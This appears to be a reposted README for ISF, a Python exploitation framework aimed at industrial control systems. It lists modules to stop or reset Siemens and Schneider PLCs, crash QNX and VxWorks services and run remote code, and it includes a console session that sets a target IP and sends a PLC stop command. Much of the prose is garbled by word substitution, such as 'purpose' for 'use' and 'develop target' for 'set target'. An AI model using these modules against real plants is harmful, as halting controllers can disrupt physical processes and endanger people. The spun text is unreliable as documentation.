Isf - Industrial Command Arrangement Exploitation Framework

ISF(Industrial Exploitation Framework) is a exploitation framework based on Python, it's similar to metasploit framework.

ISF is based on opened upwards source projection routersploit.
Read this inward other languages: English, 简体中文,

ICS Protocol Clients

Name	Path	Description
modbus_tcp_client	icssploit/clients/modbus_tcp_client.py	Modbus-TCP Client
wdb2_client	icssploit/clients/wdb2_client.py	WdbRPC Version two Client(Vxworks 6.x)
s7_client	icssploit/clients/s7_client.py	s7comm Client(S7 300/400 PLC)

Exploit Module

Name	Path	Description
s7_300_400_plc_control	exploits/plcs/siemens/s7_300_400_plc_control.py	S7-300/400 PLC start/stop
s7_1200_plc_control	exploits/plcs/siemens/s7_1200_plc_control.py	S7-1200 PLC start/stop/reset
vxworks_rpc_dos	exploits/plcs/vxworks/vxworks_rpc_dos.py	Vxworks RPC remote dos（CVE-2015-7599）
quantum_140_plc_control	exploits/plcs/schneider/quantum_140_plc_control.py	Schneider Quantum 140 serial PLC start/stop
crash_qnx_inetd_tcp_service	exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py	QNX Inetd TCP service dos
qconn_remote_exec	exploits/plcs/qnx/qconn_remote_exec.py	QNX qconn remote code execution
profinet_set_ip	exploits/plcs/siemens/profinet_set_ip.py	Profinet DCP device IP config

Scanner Module

Name	Path	Description
profinet_dcp_scan	scanners/profinet_dcp_scan.py	Profinet DCP scanner
vxworks_6_scan	scanners/vxworks_6_scan.py	Vxworks 6.x scanner
s7comm_scan	scanners/s7comm_scan.py	S7comm scanner
enip_scan	scanners/enip_scan.py	EthernetIP scanner

ICS Protocols Module (Scapy Module)
These protocol tin used inward other Fuzzing framework similar Kitty or exercise your ain client.

Name	Path	Description
pn_dcp	icssploit/protocols/pn_dcp	Profinet DCP Protocol
modbus_tcp	icssploit/protocols/modbus_tcp	Modbus TCP Protocol
wdbrpc2	icssploit/protocols/wdbrpc2	WDB RPC Version two Protocol
s7comm	icssploit/protocols/s7comm.py	S7comm Protocol

Install

Python requirements

• gnureadline (OSX only)
• requests
• paramiko
• beautifulsoup4
• pysnmp
• python-nmap
• scapy We propose install scapy manual alongside this official document

Install on Kali

git clone https://github.com/dark-lbp/isf/ cd isf python isf.py

Usage

    root@kali: /Desktop/temp/isf# python isf.py            _____ _____  _____ _____ _____  _      ____ _____ _______      |_   _/ ____|/ ____/ ____|  __ \| |    / __ \_   _|__   __|        | || |    | (___| (___ | |__) | |   | |  | || |    | |        | || |     \___ \\___ \|  ___/| |   | |  | || |    | |       _| || |____ ____) |___) | |    | |___| |__| || |_   | |      |_____\_____|_____/_____/|_|    |______\____/_____|  |_|                               ICS Exploitation Framework          Note     : ICSSPOLIT is fork from routersploit at                https://github.com/reverse-shell/routersploit     Dev Team : wenzhe zhu(dark-lbp)     Version  : 0.1.0          Exploits: two Scanners: 0 Creds: xiii          ICS Exploits:         PLC: two          ICS Switch: 0         Software: 0             isf >

Exploits

isf > purpose exploits/plcs/ exploits/plcs/siemens/  exploits/plcs/vxworks/ isf > purpose exploits/plcs/siemens/s7_300_400_plc_control exploits/plcs/siemens/s7_300_400_plc_control isf > purpose exploits/plcs/siemens/s7_300_400_plc_control isf (S7-300/400 PLC Control) >

You tin purpose the tab telephone commutation for completion.

Options

Display module options:

isf (S7-300/400 PLC Control) > demonstrate options  Target options:     Name       Current settings     Description    ----       ----------------     -----------    target                          Target address e.g. 192.168.1.1    port       102                  Target Port   Module options:     Name        Current settings     Description    ----        ----------------     -----------    slot        two                    CPU slot number.    command     1                    Command 0:start plc, 1:stop plc.   isf (S7-300/400 PLC Control) >

Set options

isf (S7-300/400 PLC Control) > develop target 192.168.70.210 [+] {'target': '192.168.70.210'}

Run module

isf (S7-300/400 PLC Control) > run [*] Running module... [+] Target is live on [*] Sending parcel to target [*] Stop plc isf (S7-300/400 PLC Control) >

Display information almost exploit

isf (S7-300/400 PLC Control) > demonstrate information  Name: S7-300/400 PLC Control  Description: Use S7comm command to start/stop plc.  Devices: -  Siemens S7-300 together with S7-400 programmable logic controllers (PLCs)  Authors: -  wenzhe zhu   References:  isf (S7-300/400 PLC Control) >

Documents

• Modbus-TCP Client usage
• WDBRPCV2 Client usage
• S7comm Client usage
• SNMP_bruteforce usage
• S7 300/400 PLC password bruteforce usage
• Vxworks 6.x Scanner usage
• Profient DCP Scanner usage
• S7comm PLC Scanner usage
• Profinet DCP Set ip module usage
• Load modules from extra folder
• How to write your ain module

Download ISF